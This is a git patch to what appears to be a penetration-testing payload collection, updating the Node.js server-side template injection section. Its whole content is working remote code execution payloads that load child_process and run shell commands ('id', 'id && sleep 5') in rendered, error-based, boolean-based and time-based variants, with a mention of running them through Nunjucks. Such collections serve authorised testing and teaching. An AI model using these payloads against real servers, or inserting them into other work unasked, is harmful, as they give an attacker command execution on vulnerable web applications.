From bec6524774724cbe859f0aab1f24491961f9e520 Mon Sep 17 00:00:00 2001
From: vladko312 <vladko312@gmail.com>
Date: Sat, 3 Jan 2026 23:19:26 +0300
Subject: [PATCH] SSTI: - Fixed NodeJS payloads

---
 Server Side Template Injection/JavaScript.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md
index 4568a71..8e8d861 100644
--- a/Server Side Template Injection/JavaScript.md	
+++ b/Server Side Template Injection/JavaScript.md	
@@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag.
 
 ```javascript
 // Rendered RCE
-global.process.mainModule.require("child_process").execSync("id")
+global.process.mainModule.require("child_process").execSync("id").toString()
 
 // Error-Based RCE
-global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id"))
-""["x"][global.process.mainModule.require("child_process").execSync("id")]
+global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id").toString())
+""["x"][global.process.mainModule.require("child_process").execSync("id").toString()]
 
 // Boolean-Based RCE
 [""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
 
 // Time-Based RCE
-global.process.mainModule.require("child_process").execSync("id && sleep 5")
+global.process.mainModule.require("child_process").execSync("id && sleep 5").toString()
 ```
 
 NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`.